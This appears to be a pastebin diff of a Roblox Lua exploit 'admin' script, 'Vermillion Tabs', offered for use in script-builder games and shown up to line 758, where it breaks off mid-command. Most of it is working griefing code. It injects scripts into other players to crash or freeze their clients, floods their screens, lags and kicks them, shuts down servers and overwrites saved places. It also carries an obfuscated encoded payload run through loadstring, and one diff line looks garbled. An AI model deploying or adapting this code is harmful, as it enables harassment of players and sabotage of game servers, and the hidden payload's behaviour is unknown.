SHOW:
|
|
- or go back to the newest paste.
| 1 | --skid tabs decrypted ~transIate~ | |
| 2 | --Not mine. | |
| 3 | --Vermillion Tabs | |
| 4 | wait() | |
| 5 | - | LocalPlayer = game:service("Players").LocalPlayer
|
| 5 | + | LocalPlayer = game:service("iispecialeffects").LocalPlayer
|
| 6 | script.Parent = ___V3rmTabs___ | |
| 7 | Tabs = {}
| |
| 8 | Cmds = {}
| |
| 9 | key = ";" | |
| 10 | chatgui = true | |
| 11 | probemode = false | |
| 12 | connection = nil | |
| 13 | Bypass = fals | |
| 14 | ||
| 15 | tabmodel = Instance.new("Model", Workspace)
| |
| 16 | tabmodel.Name = "VTabs" | |
| 17 | SourceName = "DSource" | |
| 18 | Banlist = {"UMadBrahz","jillmiles1"}
| |
| 19 | BSoDBanList = {"rogers888","cappertron20","GOLDC3PO","rabbidog","NoobsAttacks","manofthebase44"}
| |
| 20 | ||
| 21 | ||
| 22 | function Connect(player) | |
| 23 | if game.Players[player] then | |
| 24 | if not Players[player.Name] then | |
| 25 | NewLS(CrashSource,player.Backpack) | |
| 26 | table.insert(Players,player.Name) | |
| 27 | Output('Connected | '..player.Name,__)
| |
| 28 | end | |
| 29 | end | |
| 30 | end | |
| 31 | ||
| 32 | ||
| 33 | function Crash(name) | |
| 34 | name = tostring(name or "nil") | |
| 35 | local t = Instance.new("StringValue")
| |
| 36 | t.Name = "DISC: "..name | |
| 37 | t.Parent = game.Lighting | |
| 38 | game:GetService("Debris"):AddItem(t,1)
| |
| 39 | end | |
| 40 | ||
| 41 | ConnectSource = [=[ | |
| 42 | wait() | |
| 43 | script:ClearAllChildren() | |
| 44 | wait() | |
| 45 | script.Parent = nil | |
| 46 | wait() | |
| 47 | Player = game:service'Players'.LocalPlayer | |
| 48 | wait() | |
| 49 | while wait(0.1) do --this is actually the nilcrash | |
| 50 | if game.Lighting:findFirstChild("DISC: nil") then
| |
| 51 | if Player.Parent == nil then | |
| 52 | repeat Delay(0, wait) until false | |
| 53 | end | |
| 54 | end | |
| 55 | if game.Lighting:findFirstChild("DISC: "..Player.Name) then
| |
| 56 | repeat Delay(0, wait) until false | |
| 57 | end | |
| 58 | if game.Lighting:findFirstChild("DISC: all") then
| |
| 59 | repeat Delay(0, wait) until false | |
| 60 | end | |
| 61 | end | |
| 62 | ]=] | |
| 63 | ||
| 64 | ||
| 65 | BSoDSource = [==[ | |
| 66 | game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
| |
| 67 | wait(0) | |
| 68 | script.Parent = nil | |
| 69 | plr = game:GetService("Players").LocalPlayer
| |
| 70 | local plrgui = plr:findFirstChild("PlayerGui")
| |
| 71 | if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
| |
| 72 | while plr.Parent == game:GetService("Players") do
| |
| 73 | wait() | |
| 74 | for i = 1, 1000 do | |
| 75 | local sc = Instance.new("ScreenGui",plrgui)
| |
| 76 | local fr = Instance.new("TextLabel",sc)
| |
| 77 | fr.Text = "BSoD'd By V3rmilli0n be happy xd" | |
| 78 | fr.Size = UDim2.new(1, 0, 1, 0) | |
| 79 | fr.FontSize = "Size48" | |
| 80 | end | |
| 81 | end | |
| 82 | ]==] | |
| 83 | ||
| 84 | ||
| 85 | LagSource = [[ | |
| 86 | wait() | |
| 87 | script.Parent = game:service'TeleportService' | |
| 88 | CC = workspace.CurrentCamera | |
| 89 | game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
| |
| 90 | ||
| 91 | RS = game:service("RunService")
| |
| 92 | PG = game.Players.LocalPlayer.PlayerGui | |
| 93 | C = game.Players.LocalPlayer.Character | |
| 94 | function Lag() | |
| 95 | coroutine.resume(coroutine.create(function() | |
| 96 | while wait() do | |
| 97 | M = Instance.new("Message",CC)
| |
| 98 | M.Text = tick()*math.floor(5%4*21) | |
| 99 | H = Instance.new("Hint",CC)
| |
| 100 | H.Text = 'yo u got BSoD-D By V3rmilli0n ;-)' | |
| 101 | SG=Instance.new("ScreenGui",PG)
| |
| 102 | FR=Instance.new("Frame",SG)
| |
| 103 | FR.Size = UDim2.new(500,500,500,500) | |
| 104 | while wait() do | |
| 105 | FR.BackgroundColor3 = Color3.new(math.random(0,255),math.random(0,255),math.random(0,255)) | |
| 106 | end | |
| 107 | P=Instance.new("Part",CC)
| |
| 108 | E=Instance.new("Explosion",P)
| |
| 109 | E.BlastRadius=math.huge | |
| 110 | E.Position=P.Position | |
| 111 | F=Instance.new("Fire",P)
| |
| 112 | S=Instance.new("Smoke",P)
| |
| 113 | P.CFrame = CC.Focus | |
| 114 | P.Anchored = true | |
| 115 | P.CanCollide = false | |
| 116 | P.AncestryChanged:connect(function()Lag()end) | |
| 117 | for _,v in pairs(C:GetChildren()) do pcall(function()v.Anchored=true end) end | |
| 118 | end | |
| 119 | end)) | |
| 120 | end | |
| 121 | RS.Stepped:connect(function()for i=1,10 do Lag()Lag()Lag()end end) | |
| 122 | ]] | |
| 123 | ||
| 124 | ||
| 125 | ||
| 126 | ||
| 127 | coroutine.resume(coroutine.create(function() | |
| 128 | while wait(3) do | |
| 129 | if game:GetService("Players").Name ~= "Players" then
| |
| 130 | game:GetService("Players").Name = "Players"
| |
| 131 | end | |
| 132 | end | |
| 133 | end)) | |
| 134 | ||
| 135 | function Dismiss() | |
| 136 | for i = 1, 10 do | |
| 137 | for i = 1, #Tabs do | |
| 138 | table.remove(Tabs, i) | |
| 139 | if tabmodel then | |
| 140 | tabmodel:ClearAllChildren() | |
| 141 | end end end | |
| 142 | end | |
| 143 | ||
| 144 | function AddCmd(Name,Say,Desc,Func) | |
| 145 | table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
| |
| 146 | end | |
| 147 | ||
| 148 | ||
| 149 | ||
| 150 | found = false | |
| 151 | ||
| 152 | coroutine.wrap(function() | |
| 153 | while found == false do | |
| 154 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end | |
| 155 | for _,scriptinworkspace in pairs(workspace:children()) do | |
| 156 | if scriptinworkspace then | |
| 157 | if scriptinworkspace:IsA("Script") then
| |
| 158 | if scriptinworkspace:FindFirstChild(SourceName) then | |
| 159 | newScript = scriptinworkspace:Clone() | |
| 160 | wait(0.2) | |
| 161 | newScript.Name = "NewScript" | |
| 162 | newScript.Disabled = true | |
| 163 | newScript:FindFirstChild(SourceName).Value = "" | |
| 164 | Output("Source found", __)
| |
| 165 | found = true | |
| 166 | break | |
| 167 | end | |
| 168 | end | |
| 169 | end | |
| 170 | end | |
| 171 | wait() | |
| 172 | end | |
| 173 | end)() | |
| 174 | ||
| 175 | AddCmd("Unpunish player","unpunish","Restore the player's character",
| |
| 176 | function(plrs) | |
| 177 | for _, plr in pairs(plrs) do | |
| 178 | if plr then | |
| 179 | NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
| |
| 180 | end | |
| 181 | end | |
| 182 | end | |
| 183 | ) | |
| 184 | ||
| 185 | function NewS(sourcevalue, parent) | |
| 186 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then | |
| 187 | NS(sourcevalue, parent) | |
| 188 | else | |
| 189 | if newScript then | |
| 190 | local scr = newScript:Clone() | |
| 191 | if scr:FindFirstChild(SourceName) then | |
| 192 | if scr:FindFirstChild(SourceName) then | |
| 193 | scr:FindFirstChild(SourceName).Value = sourcevalue | |
| 194 | scr.Parent = parent | |
| 195 | wait(0.5) | |
| 196 | scr.Disabled = false | |
| 197 | return scr | |
| 198 | end | |
| 199 | end | |
| 200 | end | |
| 201 | end | |
| 202 | end | |
| 203 | ||
| 204 | sorcery = script:Clone() | |
| 205 | ||
| 206 | Services = {
| |
| 207 | game:GetService("Workspace"),
| |
| 208 | game:GetService("Players"),
| |
| 209 | game:GetService("Lighting"),
| |
| 210 | game:GetService("StarterPack"),
| |
| 211 | game:GetService("StarterGui"),
| |
| 212 | game:GetService("Teams"),
| |
| 213 | game:GetService("SoundService"),
| |
| 214 | game:GetService("Debris"),
| |
| 215 | game:GetService("InsertService"),
| |
| 216 | game:GetService("RunService"),
| |
| 217 | game:GetService("Chat"),
| |
| 218 | game:GetService("TeleportService"),
| |
| 219 | game:GetService("Geometry"),
| |
| 220 | game:GetService("MarketplaceService"),
| |
| 221 | game:GetService("BadgeService"),
| |
| 222 | game:GetService("NetworkClient"),
| |
| 223 | game:GetService("FriendService"),
| |
| 224 | } | |
| 225 | ||
| 226 | function Explore(Item) | |
| 227 | Dismiss() | |
| 228 | if(Item==nil)then | |
| 229 | for _,v in pairs(Services)do | |
| 230 | Output(v.Name,function() Explore(v) end) | |
| 231 | end; | |
| 232 | else | |
| 233 | f={
| |
| 234 | ['View children']=function() | |
| 235 | Dismiss() | |
| 236 | for _,v in pairs(Item:children())do | |
| 237 | Output(v.Name,function() | |
| 238 | Explore(v) | |
| 239 | wait() | |
| 240 | end); | |
| 241 | end; | |
| 242 | end; | |
| 243 | ['View parent']=function() | |
| 244 | Explore(Item.Parent) | |
| 245 | end; | |
| 246 | ['Destroy']=function() | |
| 247 | Item:Destroy(); | |
| 248 | Explore(Item.Parent); | |
| 249 | end; | |
| 250 | ['Clear']=function() | |
| 251 | Item:ClearAllChildren() | |
| 252 | end; | |
| 253 | ['Clone']=function() | |
| 254 | pcall(function() | |
| 255 | cloneableObj = Item:clone() | |
| 256 | end) | |
| 257 | end; | |
| 258 | ['Remove']=function() | |
| 259 | Item:remove() | |
| 260 | end; | |
| 261 | ['Paste']=function() | |
| 262 | if cloneableObj then | |
| 263 | cloneableObj.Parent = Item | |
| 264 | end | |
| 265 | end; | |
| 266 | ['Ki'..'ck Item']=function() | |
| 267 | NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
| |
| 268 | end; | |
| 269 | }; | |
| 270 | for i,v in pairs(f)do | |
| 271 | Output(tostring(i),v); | |
| 272 | end; | |
| 273 | Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
| |
| 274 | Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
| |
| 275 | if cloneableObj then | |
| 276 | Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
| |
| 277 | end | |
| 278 | end; | |
| 279 | end; | |
| 280 | ||
| 281 | AddCmd("Explore","explore","Explore the game",
| |
| 282 | function() | |
| 283 | Explore() | |
| 284 | end | |
| 285 | ) | |
| 286 | ||
| 287 | function NewLS(sourcevalue, parent) | |
| 288 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then | |
| 289 | NLS(sourcevalue, parent) | |
| 290 | else | |
| 291 | local NS = sorcery:Clone() | |
| 292 | NS.Name = "NewLocal" | |
| 293 | local Source = NS:findFirstChild(SourceName) | |
| 294 | if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
| |
| 295 | Source.Value = sourcevalue | |
| 296 | NS.Parent = parent | |
| 297 | NS.Disabled = false | |
| 298 | return NS | |
| 299 | end | |
| 300 | end | |
| 301 | ||
| 302 | Clothes = {}
| |
| 303 | ||
| 304 | for _,Item in pairs(LocalPlayer.Character:GetChildren()) do | |
| 305 | if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
| |
| 306 | table.insert(Clothes,Item:Clone()) | |
| 307 | end | |
| 308 | end | |
| 309 | for i,v in pairs(LocalPlayer.Character:GetChildren()) do | |
| 310 | if v:IsA("BodyColors") then
| |
| 311 | body = v | |
| 312 | torsocolor = body.TorsoColor | |
| 313 | leftlegcolor = body.LeftLegColor | |
| 314 | rightlegcolor = body.RightLegColor | |
| 315 | leftarmcolor = body.LeftArmColor | |
| 316 | rightarmcolor = body.RightArmColor | |
| 317 | headcolor = body.HeadColor | |
| 318 | end | |
| 319 | end | |
| 320 | ||
| 321 | mouse = LocalPlayer:GetMouse() | |
| 322 | ||
| 323 | mouse.KeyDown:connect(function(key) | |
| 324 | if key == "z" then | |
| 325 | game:service'StarterGui':SetCoreGuiEnabled(4, true) | |
| 326 | end | |
| 327 | end) | |
| 328 | ||
| 329 | AddCmd("chat;on/off","chat","ChatGUI on/off",
| |
| 330 | function(plrs, msg) | |
| 331 | if msg == "off" then | |
| 332 | chatgui = false | |
| 333 | elseif msg == "on" then | |
| 334 | chatgui = true | |
| 335 | end | |
| 336 | end | |
| 337 | ) | |
| 338 | ||
| 339 | AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
| |
| 340 | function(plrs, msg) | |
| 341 | local keypos = msg:find(key) | |
| 342 | local targPlayers = msg:sub(1,keypos-1) | |
| 343 | local plrs = getPlayers(targPlayers) | |
| 344 | local speed = msg:sub(tonumber(keypos+1)) | |
| 345 | for _,v in pairs(plrs) do | |
| 346 | if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
| |
| 347 | v.Character:findFirstChild("Humanoid").WalkSpeed = speed
| |
| 348 | end | |
| 349 | end | |
| 350 | end | |
| 351 | ) | |
| 352 | ||
| 353 | ||
| 354 | Bad_Char = "" | |
| 355 | ||
| 356 | function chatgui(msg) | |
| 357 | if not chatgui then return end | |
| 358 | if probemode == false then | |
| 359 | if LocalPlayer.Character:findFirstChild("Head") then
| |
| 360 | mainPart = LocalPlayer.Character:findFirstChild("Head")
| |
| 361 | end | |
| 362 | end | |
| 363 | if probemode == true then | |
| 364 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
| 365 | mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") | |
| 366 | end | |
| 367 | end | |
| 368 | local bg = Instance.new("BillboardGui", mainPart)
| |
| 369 | bg.Adornee = mainPart | |
| 370 | bg.Name = "CHATGUIBG" | |
| 371 | bg.Size = UDim2.new(4, 0, 2.5, 0) | |
| 372 | bg.StudsOffset = Vector3.new(-4, 2, 0) | |
| 373 | local bg2 = Instance.new("BillboardGui", mainPart)
| |
| 374 | bg2.Adornee = mainPart | |
| 375 | bg2.Name = "CHATGUIBG2" | |
| 376 | bg2.Size = UDim2.new(4, 0, 2.5, 0) | |
| 377 | bg2.StudsOffset = Vector3.new(-4, 4.5, 0) | |
| 378 | local text = Instance.new("TextLabel", bg)
| |
| 379 | text.Size = UDim2.new(3, 0, 0.5, 0) | |
| 380 | text.FontSize = "Size18" | |
| 381 | text.TextScaled = true | |
| 382 | text.TextTransparency = 0 | |
| 383 | text.BackgroundTransparency = 1 | |
| 384 | text.TextTransparency = 0 | |
| 385 | text.TextStrokeTransparency = 0 | |
| 386 | text.Font = "Arial" | |
| 387 | text.TextColor3 = Color3.new(255, 0, 0) | |
| 388 | text.Text = " " | |
| 389 | Message = msg:gsub("","\5")
| |
| 390 | if #Message >50 then return end | |
| 391 | for i = 0, #Message, 1 do | |
| 392 | wait(0.01) | |
| 393 | text.Text = string.gsub("("..LocalPlayer.Name.."): "..Message:gsub(0, i),'fuck','fuck')
| |
| 394 | end | |
| 395 | wait() | |
| 396 | coroutine.resume(coroutine.create(function() | |
| 397 | for i = 0, 5, 0.05 do | |
| 398 | if bg ~= nil then | |
| 399 | if bg2 ~= nil then | |
| 400 | wait() | |
| 401 | bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0) | |
| 402 | end | |
| 403 | bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0) | |
| 404 | end | |
| 405 | end | |
| 406 | end)) | |
| 407 | for i=text.TextTransparency,1,0.02 do | |
| 408 | wait() | |
| 409 | text.TextTransparency = i | |
| 410 | text.TextStrokeTransparency = i | |
| 411 | end | |
| 412 | if bg == nil then return end | |
| 413 | bg:Destroy() | |
| 414 | if bg2 == nil then return end | |
| 415 | bg2:Destroy() | |
| 416 | end | |
| 417 | ||
| 418 | LocalPlayer.Chatted:connect(chatgui) | |
| 419 | ||
| 420 | AddCmd("Commands","cmds","Show the list of commands",
| |
| 421 | function() | |
| 422 | Dismiss() | |
| 423 | for i, v in pairs(Cmds) do | |
| 424 | Output(v["Name"], | |
| 425 | function() | |
| 426 | Output("Description: "..v["Desc"], __)
| |
| 427 | Output("Usage: "..v["Say"], __)
| |
| 428 | Output("Name: "..v["Name"], __)
| |
| 429 | end) | |
| 430 | end | |
| 431 | end | |
| 432 | ) | |
| 433 | ||
| 434 | AddCmd("Rejoin player","rej","Rejoin the player",
| |
| 435 | function(plrs) | |
| 436 | for _, plr in pairs(plrs) do | |
| 437 | if plr and plr.Backpack then | |
| 438 | NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
| |
| 439 | end | |
| 440 | end | |
| 441 | end | |
| 442 | ) | |
| 443 | ||
| 444 | AddCmd("Clean workspace","clean","Clean the lag nobs made",
| |
| 445 | function() | |
| 446 | for a,b in pairs(game.Workspace:GetChildren()) do | |
| 447 | if not game.Players:GetPlayerFromCharacter(b) and b.Name ~= 'Base' and b.Name ~= 'Camera' then | |
| 448 | pcall(function() b:Destroy() end) | |
| 449 | end | |
| 450 | end | |
| 451 | if game.Workspace:findFirstChild('Base') == nil then
| |
| 452 | local Base = Instance.new("Part",Game.Workspace)
| |
| 453 | Base.Name = "Base" | |
| 454 | Base.Anchored = true | |
| 455 | Base.Locked = true | |
| 456 | Base.BrickColor = BrickColor.new("Bright green")
| |
| 457 | Base.Size = Vector3.new(2048,2,2048) | |
| 458 | Base.CFrame = CFrame.new(0,0,0) | |
| 459 | end | |
| 460 | Output('You have cleaned workspace!')
| |
| 461 | end | |
| 462 | ) | |
| 463 | ||
| 464 | AddCmd("Execute", "exe","Execute a LocalScript for admin",
| |
| 465 | function(plrs, msg) | |
| 466 | a,b = ypcall(function() | |
| 467 | loadstring(msg)() | |
| 468 | end) if not a then Output(b,"Bright red") end | |
| 469 | end | |
| 470 | ) | |
| 471 | ||
| 472 | AddCmd("Anchored", "anchor","Anchor all parts",
| |
| 473 | function() | |
| 474 | g = game.Workspace:GetChildren () do | |
| 475 | for i = 1, #g do | |
| 476 | if g[i].ClassName == "Part" then | |
| 477 | g[i].Anchored = true else if | |
| 478 | g[i].ClassName == "Model" then | |
| 479 | y = g[i]:GetChildren () | |
| 480 | for i = 1, #y do | |
| 481 | if y[i].ClassName == "Part" then | |
| 482 | y[i].Anchored = true | |
| 483 | end | |
| 484 | end | |
| 485 | end | |
| 486 | end | |
| 487 | end | |
| 488 | end | |
| 489 | end | |
| 490 | ) | |
| 491 | ||
| 492 | AddCmd("unanchor", "unanchor","unanchor all parts",
| |
| 493 | function() | |
| 494 | g = game.Workspace:GetChildren () do | |
| 495 | for i = 1, #g do | |
| 496 | if g[i].ClassName == "Part" then | |
| 497 | g[i].Anchored = false else if | |
| 498 | g[i].ClassName == "Model" then | |
| 499 | y = g[i]:GetChildren () | |
| 500 | for i = 1, #y do | |
| 501 | if y[i].ClassName == "Part" then | |
| 502 | y[i].Anchored = false | |
| 503 | end | |
| 504 | end | |
| 505 | end | |
| 506 | end | |
| 507 | end | |
| 508 | end | |
| 509 | end | |
| 510 | ) | |
| 511 | ||
| 512 | AddCmd("Admin a player","vtabs","Give admin to a player",
| |
| 513 | function(plrs) | |
| 514 | for _, plr in pairs(plrs) do | |
| 515 | if plr and plr.Backpack then | |
| 516 | script.Parent = plr.Backpack | |
| 517 | Output("You gave admin to: "..plr.Name, __)
| |
| 518 | end | |
| 519 | end | |
| 520 | end | |
| 521 | ) | |
| 522 | ||
| 523 | AddCmd("AFK","afk","Ping yourself as afk",
| |
| 524 | function() | |
| 525 | Dismiss() | |
| 526 | for i = 1,8 do | |
| 527 | wait() | |
| 528 | Output(''..LocalPlayer.Name.." is afk")
| |
| 529 | end | |
| 530 | end | |
| 531 | ) | |
| 532 | ||
| 533 | AddCmd("Back","back","Ping yourself as back",
| |
| 534 | function() | |
| 535 | Dismiss() | |
| 536 | for i = 1,8 do | |
| 537 | wait() | |
| 538 | Output(''..LocalPlayer.Name.." is back bby")
| |
| 539 | end | |
| 540 | wait(3) | |
| 541 | Dismiss() | |
| 542 | end | |
| 543 | ) | |
| 544 | ||
| 545 | AddCmd("Ban a player","ban","Kicks a player when he enters",
| |
| 546 | function(plrs, msg) | |
| 547 | for _,v in pairs(plrs) do | |
| 548 | if v then | |
| 549 | table.insert(Banlist,v.Name) | |
| 550 | Output('Banned | '..v.Name,__)
| |
| 551 | else | |
| 552 | Output(Error) | |
| 553 | end | |
| 554 | end | |
| 555 | end | |
| 556 | ) | |
| 557 | ||
| 558 | local z={["@"]=0,["*"]=1,["$"]=2,["%"]=3,[")"]=4,["("]=5,["~"]=6,["!"]=7,["-"]=8,["_"]=9,["="]=10,["+"]=11,["#"]=12,["&"]=13,["?"]=14,["^"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
| |
| 559 | "*))~)~%)&~)~-A$_)?A~^~$$#A$~!_~?A~^~$$#A$_~?A~^~@$@A!?~%!@$+~$$#$=@~~(!?~%~)!_~^~?~-$_$=@))_~%!&~_~%!%!-$_$=@~~^~$!@$_~@$&%@$*%#$$%@$)~^~=@!!*~_~)!-$_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@(~?~)~=@(~?~)~=@_$" | |
| 560 | }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())() | |
| 561 | ||
| 562 | AddCmd("Fix Lighting","lfix","Fix the Lighting ",
| |
| 563 | function() | |
| 564 | function dtr() | |
| 565 | local sk = game.Lighting:findFirstChild("Sky")
| |
| 566 | if sk ~= nil then | |
| 567 | sk:Remove() | |
| 568 | end | |
| 569 | game.Lighting.FogEnd = 10011111111 | |
| 570 | game.Lighting.Ambient = Color3.new(0.5,0.5,0.5) | |
| 571 | game.Lighting.TimeOfDay = "14:00:00" | |
| 572 | game.Lighting.Ambient = Color3.new(0.5,0.5,0.5) | |
| 573 | game.Lighting.Brightness = 1 | |
| 574 | game.Lighting.ColorShift_Bottom = Color3.new(0,0,0) | |
| 575 | game.Lighting.ColorShift_Top = Color3.new(0,0,0) | |
| 576 | game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7) | |
| 577 | end | |
| 578 | ||
| 579 | dtr() | |
| 580 | ||
| 581 | game.Lighting.Changed:connect(dtr) | |
| 582 | end | |
| 583 | ) | |
| 584 | ||
| 585 | AddCmd("Set SkyBox","vbox","et Skybox l0l",
| |
| 586 | function() | |
| 587 | function getAll(obj) | |
| 588 | for i, v in pairs(obj:getChildren()) do | |
| 589 | if v:IsA("BasePart") then
| |
| 590 | v.Anchored = false | |
| 591 | v.BrickColor = BrickColor.new(0) | |
| 592 | bv = Instance.new("BodyVelocity")
| |
| 593 | bv.Parent = v | |
| 594 | bv.maxForce = Vector3.new(100000000,100000000,100000000) | |
| 595 | end | |
| 596 | getAll(v) | |
| 597 | end | |
| 598 | end | |
| 599 | getAll(workspace) | |
| 600 | game.Lighting.TimeOfDay = "07:00:00" | |
| 601 | game.Lighting.Ambient = Color3.new(0,0,0) | |
| 602 | sky = Instance.new("Sky")
| |
| 603 | sky.Parent = game.Lighting | |
| 604 | sky.SkyboxBk = "http://www.roblox.com/asset/?id=122579628" | |
| 605 | sky.SkyboxDn = "http://www.roblox.com/asset/?id=122579628" | |
| 606 | sky.SkyboxFt = "http://www.roblox.com/asset/?id=122579628" | |
| 607 | sky.SkyboxLf = "http://www.roblox.com/asset/?id=122579628" | |
| 608 | sky.SkyboxRt = "http://www.roblox.com/asset/?id=122579628" | |
| 609 | sky.SkyboxUp = "http://www.roblox.com/asset/?id=122579628" | |
| 610 | end | |
| 611 | ) | |
| 612 | ||
| 613 | ||
| 614 | AddCmd("Shutdown","sd","Shuts the server down",
| |
| 615 | function() | |
| 616 | Output("Shutting down server!","Really red")
| |
| 617 | wait(1) | |
| 618 | for _,v in pairs(game.Players:GetPlayers()) do v:Kick() end | |
| 619 | end | |
| 620 | ) | |
| 621 | ||
| 622 | AddCmd("RuinSB","rsb","Ruins a not-saveplace protected scriptbuilder",
| |
| 623 | function() | |
| 624 | if SourceName == "source" then | |
| 625 | Output("This is Alakazards scriptbuilder, can't use SavePlace here!","Really red")
| |
| 626 | else | |
| 627 | NewS([[game:SavePlace()]],Workspace) | |
| 628 | end | |
| 629 | end | |
| 630 | ) | |
| 631 | ||
| 632 | AddCmd("Respawn","respawn","Respawn player",
| |
| 633 | function(plrs) | |
| 634 | for _,plr in pairs(plrs) do | |
| 635 | if plr then | |
| 636 | NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
| |
| 637 | end | |
| 638 | end | |
| 639 | end | |
| 640 | ) | |
| 641 | ||
| 642 | AddCmd("Connect","connect","Connect a player",
| |
| 643 | function(plrs) | |
| 644 | for _,plr in pairs(plrs) do | |
| 645 | if plr and plr.Backpack then | |
| 646 | Connect(plr) | |
| 647 | end | |
| 648 | end | |
| 649 | end | |
| 650 | ) | |
| 651 | ||
| 652 | AddCmd("Night","night","Makes it night",
| |
| 653 | function() | |
| 654 | game.Lighting.TimeOfDay = "00:00:00" | |
| 655 | end | |
| 656 | ) | |
| 657 | ||
| 658 | AddCmd("Day","day","Makes it day",
| |
| 659 | function() | |
| 660 | game.Lighting.TimeOfDay = "12:00:00" | |
| 661 | end | |
| 662 | ) | |
| 663 | ||
| 664 | AddCmd("Disc","dc","Disconnects a player form the game",
| |
| 665 | function(plrs) | |
| 666 | for _,plr in pairs(plrs) do | |
| 667 | if plr and plr.Backpack then | |
| 668 | NewLS([[local lp = game.Players.LocalPlayer;lp.Parent = nil;wait();lp.Parent = game.Players]],plr.Backpack) | |
| 669 | end | |
| 670 | end | |
| 671 | end) | |
| 672 | ||
| 673 | AddCmd("LocalScript","ls","LocalScript",
| |
| 674 | function(nothing, msg) | |
| 675 | if LocalPlayer.Parent ~= nil then | |
| 676 | NewLS(msg, LocalPlayer.Backpack) | |
| 677 | end | |
| 678 | end | |
| 679 | ) | |
| 680 | ||
| 681 | AddCmd("Playerinfo","pinfo","Shows info on a player",
| |
| 682 | function(plrs) | |
| 683 | for _,plr in pairs(plrs) do | |
| 684 | if plr then | |
| 685 | Output("Age: "..plr.AccountAge,"noncolar")
| |
| 686 | Output("Membership: "..plr.MembershipType.Name,"Hot pink")
| |
| 687 | Output("Player: "..plr.Name,"Really red")
| |
| 688 | Output("Id: "..plr.userId,"New Yeller")
| |
| 689 | Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
| |
| 690 | end | |
| 691 | end | |
| 692 | end) | |
| 693 | ||
| 694 | AddCmd("Force shutdown","fsd","Forces shutdown with a ManualSurfaceJoint",
| |
| 695 | function(nothing, msg) | |
| 696 | NewS([[local b = Instance.new ("ManualSurfaceJointInstance",Workspace)]],workspace)
| |
| 697 | end | |
| 698 | ) | |
| 699 | ||
| 700 | AddCmd("Message","m","Show a message",
| |
| 701 | function(nothing, msg) | |
| 702 | if found then | |
| 703 | NewS([[ | |
| 704 | a = Instance.new("Message", workspace)
| |
| 705 | msg = "]]..msg..[[" | |
| 706 | msg = msg:gsub("","\5")
| |
| 707 | game:service'Debris':AddItem(a, 5) | |
| 708 | while wait() do | |
| 709 | for i = 30,0,-1 do | |
| 710 | a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
| |
| 711 | wait() | |
| 712 | end | |
| 713 | for i = 0,30,1 do | |
| 714 | a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
| |
| 715 | wait() | |
| 716 | end | |
| 717 | end | |
| 718 | ]], workspace) | |
| 719 | end | |
| 720 | end | |
| 721 | ) | |
| 722 | ||
| 723 | AddCmd("Create base","base","Create the base",
| |
| 724 | function() | |
| 725 | a = Instance.new("Part")
| |
| 726 | a.Parent = Workspace | |
| 727 | a.Name = "Base" | |
| 728 | a.Position = Vector3.new(0, 0.6, 0) | |
| 729 | a.Size = Vector3.new(1002, 0, 1002) | |
| 730 | a.Material = "Grass" | |
| 731 | a.Anchored = true | |
| 732 | a.BrickColor = BrickColor.new("Dark green")
| |
| 733 | end | |
| 734 | ) | |
| 735 | ||
| 736 | AddCmd("Ping","ping","Ping something",
| |
| 737 | function(plrs, msg) | |
| 738 | if msg == "" then | |
| 739 | Output("pong", __)
| |
| 740 | else | |
| 741 | Output(msg, __) | |
| 742 | end | |
| 743 | end | |
| 744 | ) | |
| 745 | ||
| 746 | AddCmd("Dismiss","dt","Dismiss tabs",
| |
| 747 | function() | |
| 748 | Dismiss() | |
| 749 | end | |
| 750 | ) | |
| 751 | ||
| 752 | AddCmd("God player","god","OYUS FULL HEALTH",
| |
| 753 | function(plrs) | |
| 754 | for _, plr in pairs(plrs) do | |
| 755 | if plr and plr.Character and plr.Character.Humanoid then | |
| 756 | me = plr | |
| 757 | select=Instance.new("SelectionBox",me.Character.Head)
| |
| 758 | select1=Instance.new("SelectionBox",me.Character.Torso)
| |
